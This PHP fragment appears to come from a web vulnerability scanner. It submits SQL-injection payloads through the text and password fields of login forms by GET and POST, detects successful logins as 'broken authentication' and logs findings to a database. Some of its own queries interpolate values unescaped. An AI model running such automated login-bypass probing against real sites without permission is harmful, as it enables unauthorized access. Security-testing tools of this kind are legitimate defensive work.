$log->lwrite("Checking if {$urlToCheck} displays the same page at different intervals"); $responseBodies = array(); $http = new http_class(); $http->timeout = 0; $http->data_timeout = 0; //$http->debug=1; $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; $http->follow_redirect = 1; $http->redirection_limit = 5; $http->setTestId($testId); for ($a = 0; $a < 3; $a++) { $error = $http->GetRequestArguments($urlToCheck, $arguments); $error = $http->Open($arguments); if ($error == "") { $number = $a + 1; $log->lwrite("Sending HTTP request number {$number} to {$urlToCheck}"); $error = $http->SendRequest($arguments); if ($error == "") { $headers = array(); $error = $http->ReadReplyHeaders($headers); if ($error == "") { $error = $http->ReadWholeReplyBody($body); if (strlen($error) == 0) { array_push($responseBodies, $body); } } } $http->Close(); } if (strlen($error)) { echo "<H2 align=\"center\">Error: a= {$a} ", $error, "</H2>\n"; } } $pageChanges = true; $bodyOfUrl = ""; if ($responseBodies[0] == $responseBodies[1] && $responseBodies[1] == $responseBodies[2]) { $bodyOfUrl = $responseBodies[0]; $pageChanges = false; } $log->lwrite('Beginning testing of forms'); for ($i = 0; $i < sizeof($arrayOfForms); $i++) { $currentForm = $arrayOfForms[$i]; $currentFormId = $currentForm->getId(); $currentFormName = $currentForm->getName(); $currentFormMethod = $currentForm->getMethod(); $currentFormAction = $currentForm->getAction(); $currentFormNum = $currentForm->getFormNum(); $arrayOfCurrentFormsInputs = array(); $log->lwrite("Beginning testing of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}"); for ($j = 0; $j < sizeof($arrayOfInputFields); $j++) { $currentInput = $arrayOfInputFields[$j]; $currentInputIdOfForm = $currentInput->getIdOfForm(); $currentInputNameOfForm = $currentInput->getNameOfForm(); $currentInputFormNum = $currentInput->getFormNum(); if ($currentFormNum == $currentInputFormNum) { array_push($arrayOfCurrentFormsInputs, $currentInput); } } $log->lwrite("Beginning testing input fields of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}"); foreach ($arrayOfPayloads as $currentPayload) { echo '<br>Size of current form inputs = ' . sizeof($arrayOfCurrentFormsInputs) . '<br>'; $arrayOfValues = array(); //Array of PostOrGetObject objects for ($k = 0; $k < sizeof($arrayOfCurrentFormsInputs); $k++) { $currentFormInput = $arrayOfCurrentFormsInputs[$k]; $currentFormInputName = $currentFormInput->getName(); $currentFormInputType = $currentFormInput->getType(); $currentFormInputValue = $currentFormInput->getValue(); if ($currentFormInputType != 'reset') { $log->lwrite("Using payload: {$currentPayload}, to all input fields of form w/ action: {$currentFormAction}"); //Add current input and other inputs to array of post values and set their values if ($currentFormInputType == 'text' || $currentFormInputType == 'password') { $postObject = new PostOrGetObject($currentFormInputName, $currentPayload); array_push($arrayOfValues, $postObject); } else { if ($currentFormInputType == 'checkbox' || $currentFormInputType == 'submit') { $postObject = new PostOrGetObject($currentFormInputName, $currentFormInputValue); array_push($arrayOfValues, $postObject); } else { if ($currentFormInputType == 'radio') { $postObject = new PostOrGetObject($currentFormInputName, $currentFormInputValue); //Check if a radio button in the radio group has already been added $found = false; for ($n = 0; $n < sizeof($arrayOfValues); $n++) { if ($arrayOfValues[$n]->getName() == $postObject->getName()) { $found = true; break; } } if (!$found) { array_push($arrayOfValues, $postObject); } } } } } } if ($currentFormMethod == 'get') { //Build query string and submit it at end of URL if ($urlOfSite[strlen($urlOfSite) - 1] == '/') { $actionUrl = $urlOfSite . $currentFormAction; } else { $actionUrl = $urlOfSite . '/' . $currentFormAction; } $totalTestStr = ''; //Make a string to show the user how the vulnerability was tested for i.e. the data submitted to exploit the vulnerability for ($p = 0; $p < sizeof($arrayOfValues); $p++) { $currentPostValue = $arrayOfValues[$p]; $currentPostValueName = $currentPostValue->getName(); $currentPostValueValue = $currentPostValue->getValue(); $totalTestStr .= $currentPostValueName; $totalTestStr .= '='; $totalTestStr .= $currentPostValueValue; if ($p != sizeof($arrayOfValues) - 1) { $totalTestStr .= '&'; } } $actionUrl .= '?'; $actionUrl .= $totalTestStr; $error = $http->GetRequestArguments($actionUrl, $arguments); $error = $http->Open($arguments); $log->lwrite("URL to be requested is: {$actionUrl}"); if ($error == "") { $log->lwrite("Sending HTTP request to {$actionUrl}"); $error = $http->SendRequest($arguments); if ($error == "") { $headers = array(); $error = $http->ReadReplyHeaders($headers); if ($error == "") { $error = $http->ReadWholeReplyBody($body); if (strlen($error) == 0) { $http->Close(); $vulnerabilityFound = checkIfVulnerabilityFound($urlToCheck, $pageChanges, $bodyOfUrl, $log, $currentPayload, $http); if ($vulnerabilityFound) { $totalTestStr = ''; //Make a test string to show the user how the vulnerability was tested for for ($p = 0; $p < sizeof($arrayOfValues); $p++) { $currentPostValue = $arrayOfValues[$p]; $currentPostValueName = $currentPostValue->getName(); $currentPostValueValue = $currentPostValue->getValue(); $totalTestStr .= $currentPostValueName; $totalTestStr .= '='; $totalTestStr .= $currentPostValueValue; if ($p != sizeof($arrayOfValues) - 1) { $totalTestStr .= '&'; } } //The echo's below are for testing the function on its own i.e. requesting this script with your browser echo 'Broken Authentication Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>'; echo 'Method: ' . $currentFormMethod . '<br>'; echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>'; echo 'Error: Successfully Logged In with SQL injection'; $tableName = 'test' . $testId; //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB. $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'basqli' AND method = '{$currentFormMethod}' AND url = '" . addslashes($actionUrl) . "' AND attack_str = '" . addslashes($totalTestStr) . "'"; $result = $db->query($query); if (!$result) { $log->lwrite("Could not execute query {$query}"); } else { $log->lwrite("Successfully executed query {$query}"); $numRows = $result->num_rows; if ($numRows == 0) { $log->lwrite("Number of rows is {$numRows} for query: {$query}"); insertTestResult($db, $testId, 'basqli', $currentFormMethod, addslashes($actionUrl), addslashes($totalTestStr)); } } break; } } } } } if (strlen($error)) { echo "<H2 align=\"center\">Error: ", $error, "</H2>\n"; echo 'Method: ' . $currentFormMethod . '<br>'; echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>'; } } else { if ($currentFormMethod == 'post') { //Build query string and submit it at end of URL if ($urlOfSite[strlen($urlOfSite) - 1] == '/') { $actionUrl = $urlOfSite . $currentFormAction; } else { $actionUrl = $urlOfSite . '/' . $currentFormAction; } $error = $http->GetRequestArguments($actionUrl, $arguments); $arguments["RequestMethod"] = "POST"; $arguments["PostValues"] = array(); for ($p = 0; $p < sizeof($arrayOfValues); $p++) { $currentPostValue = $arrayOfValues[$p]; $currentPostValueName = $currentPostValue->getName(); $currentPostValueValue = $currentPostValue->getValue(); $tempArray = array($currentPostValueName => $currentPostValueValue); $arguments["PostValues"] = array_merge($arguments["PostValues"], $tempArray); } $error = $http->Open($arguments); $log->lwrite("URL to be requested is: {$actionUrl}"); if ($error == "") { $log->lwrite("Sending HTTP request to {$actionUrl}"); $error = $http->SendRequest($arguments); if ($error == "") { $headers = array(); $error = $http->ReadReplyHeaders($headers); if ($error == "") { $error = $http->ReadWholeReplyBody($body); if (strlen($error) == 0) { $http->Close(); $vulnerabilityFound = checkIfVulnerabilityFound($urlToCheck, $pageChanges, $bodyOfUrl, $log, $currentPayload, $http); if ($vulnerabilityFound) { $totalTestStr = ''; //Compile a test string to show the user how the vulnerability was tested for for ($p = 0; $p < sizeof($arrayOfValues); $p++) { $currentPostValue = $arrayOfValues[$p]; $currentPostValueName = $currentPostValue->getName(); $currentPostValueValue = $currentPostValue->getValue(); $totalTestStr .= $currentPostValueName; $totalTestStr .= '='; $totalTestStr .= $currentPostValueValue; if ($p != sizeof($arrayOfValues) - 1) { $totalTestStr .= '&'; } } //The echo's below are for testing the function on its own i.e. requesting this script with your browser echo 'Broken Authentication Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>'; echo 'Method: ' . $currentFormMethod . '<br>'; echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>'; echo 'Error: Successfully Logged In with SQL injection'; $tableName = 'test' . $testId; //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB. $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'basqli' AND method = '{$currentFormMethod}' AND url = '" . addslashes($actionUrl) . "' AND attack_str = '" . addslashes($totalTestStr) . "'"; $result = $db->query($query); if (!$result) { $log->lwrite("Could not execute query {$query}"); } else { $log->lwrite("Successfully executed query {$query}"); $numRows = $result->num_rows; if ($numRows == 0) { $log->lwrite("Number of rows is {$numRows} for query: {$query}"); insertTestResult($db, $testId, 'basqli', $currentFormMethod, addslashes($actionUrl), addslashes($totalTestStr)); } } break; } } } } } if (strlen($error)) { echo "<H2 align=\"center\">Error: ", $error, "</H2>\n"; echo 'Method: ' . $currentFormMethod . '<br>'; echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>'; } } } } } }